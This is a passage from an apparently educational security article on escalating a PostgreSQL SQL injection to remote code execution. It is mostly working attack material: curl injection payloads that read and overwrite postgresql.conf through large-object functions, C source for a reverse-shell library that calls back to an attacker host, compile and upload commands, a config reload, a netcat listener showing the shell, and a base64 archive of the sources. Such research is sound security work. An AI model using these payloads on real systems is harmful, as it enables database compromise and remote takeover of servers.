    {"id":1337,"text":"/etc/postgresql/13/main/postgresql.conf"}
]
--------------------------------------------------------------------------


Let's download it with the help of previously used Large Object functions:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/etc/postgresql/13/main/postgresql.conf', 3333331337)) AS text)"
[
    {"id":1337,"text":"3333331337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(3333331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > postgresql.conf
--------------------------------------------------------------------------


---[ 4.1 - Choosing a parameter to exploit

There are several known options that can already be used for an RCE:

- ssl_passphrase_command (by Denis Andzakovic[5])
- archive_command (by sylsTyping[6])

But are any other parameters worth looking into?

--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -

#local_preload_libraries = ''
#session_preload_libraries = ''
#shared_preload_libraries = ''	# (change requires restart)
...

# - Other Defaults -

#dynamic_library_path = '$libdir'
--------------------------------------------------------------------------


These parameters specify libraries to be loaded dynamically by the DBMS
from the path specified in the "dynamic_library_path" variable, under
specific conditions. That sounds promising!

We will focus on the "session_preload_libraries" variable, which dictates
what libraries should be preloaded by the server on a new connection[11].
It does not require a restart of the server, unlike
"shared_preload_libraries", and does not have a specific prefix prepended
to the path like the "local_preload_libraries" variable.

So, we can rewrite the malicious postgresql.conf to have a writable
directory in the "dynamic_library_path", e.g. /tmp, and to have a
rogue library filename in the "shared_preload_libraries", e.g.
"payload.so".

The updated config file will look like this:

--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -
session_preload_libraries = 'payload.so'
...

# - Other Defaults -

dynamic_library_path = '/tmp:$libdir'
--------------------------------------------------------------------------


---[ 4.2 - Compiling the malicious library

One of the final steps is to compile a malicious library for the server to
load. The code will naturally vary depending on the OS the DBMS is running
under. For the Unix-like case, let's compile the following simple reverse
shell into an .so file. The "_init()" function will automatically fire on
library load:

--------------------------------------------------------------------------
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
    /*
        code taken from https://www.revshells.com/
    */

    int port = 8888;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
}
--------------------------------------------------------------------------


Notice the presence of the "PG_MODULE_MAGIC" field in the code. It is
required for the library to be recognized and loaded by the PostgreSQL
server.

Before compilation, we must install proper PostgreSQL development packages
for the correct major version, 13 in our case:

--------------------------------------------------------------------------
$ sudo apt install postgresql-13 postgresql-server-dev-13 -y
--------------------------------------------------------------------------


The code can be compiled with gcc with the following command:
--------------------------------------------------------------------------
$ gcc \
-I$(pg_config --includedir-server) \
-shared \
-fPIC \
-nostartfiles \
-o payload.so \
payload.c
--------------------------------------------------------------------------


---[ 4.3 - Uploading the config and library to the server

With the updated config file and compiled library on our hands, it is time
to upload and overwrite everything on the target DBMS host.

Uploading and replacing the postgresql.conf file:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331333337, decode('$(base64 -w 0 postgresql_new.conf)', 'base64'))) AS text)"
[
    {"id":1337,"text":"3331333337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331333337, '/etc/postgresql/13/main/postgresql.conf')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------


Uploading the malicious .so file:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33313333337, decode('$(base64 -w 0 payload.so)', 'base64'))) AS text)"
[
    {"id":1337,"text":"33313333337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(33313333337, '/tmp/payload.so')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------


If everything is correct, we should see the updated config and .so file in
place:

--------------------------------------------------------------------------
# .so library
=== target server ===
ubuntu@ubuntu-virtual-machine:/tmp$ md5sum payload.so
0a240596d100c8ca8e781543884da202  payload.so

=== attacker server ===
$ md5sum payload.so
0a240596d100c8ca8e781543884da202  payload.so


# postgresql.conf
=== target server ===
ubuntu@ubuntu-virtual-machine:~$ md5sum /etc/postgresql/13/main/postgresql.conf
480bb646f178be2a9a2b609b384e20de  /etc/postgresql/13/main/postgresql.conf

=== attacker server ===
$ md5sum postgresql_new.conf
480bb646f178be2a9a2b609b384e20de  postgresql_new.conf
--------------------------------------------------------------------------

---[ 4.4 - Reload successful

We are all set. Now for the moment of glory! A quick config reload and we
get a reverse shell back from the server.

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
    {"id":1337,"text":"true"}
]
--------------------------------------------------------------------------


On the attacker host:

--------------------------------------------------------------------------
$ nc -lvnp 8888
Listening on 0.0.0.0 8888
Connection received on 172.23.16.1 53004

id
uid=129(postgres) gid=138(postgres) groups=138(postgres),115(ssl-cert)
pwd
/var/lib/postgresql
--------------------------------------------------------------------------


--[ 5 - Conclusions

In this article, we managed to escalate the impact of a seemingly very
restricted SQL injection to a critical level by recreating DELETE and
UPDATE statements from scratch via the direct modification of the DBMS
files and data, and develop a novel technique of escalating user
permissions!

Excessive server file read/write permissions can be a powerful tool in
the wrong hands. There is still much to discover with this attack vector,
but I hope you've learned something useful today.

Cheers,
adeadfed


--[ 6 - References
[0]  https://github.com/gin-gonic/gin
[1]  https://github.com/jackc/pgx
[2]  https://github.com/jackc/pgx/issues/1090
[3]  https://github.com/postgres/postgres/blob/2346df6fc373df9c5ab944eebecf7d3036d727de/src/backend/tcop/postgres.c#L1468
[4]  https://www.postgresql.org/docs/current/lo-funcs.html
[5]  https://pulsesecurity.co.nz/articles/postgres-sqli
[6]  https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3
[7]  https://www.postgresql.org/docs/9.4/functions-admin.html
[8]  https://www.postgresql.org/docs/current/storage-hot.html
[9]  https://www.postgresql.org/docs/current/storage-page-layout.html
[10] https://github.com/adeadfed/postgresql-filenode-editor
[11] https://postgresqlco.nf/doc/en/param/session_preload_libraries/
[12] https://www.manniwood.com/2020_12_21/read_pg_from_go.html


--[ 7 - Source code

base64 -w 75 sources.tar.gz
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
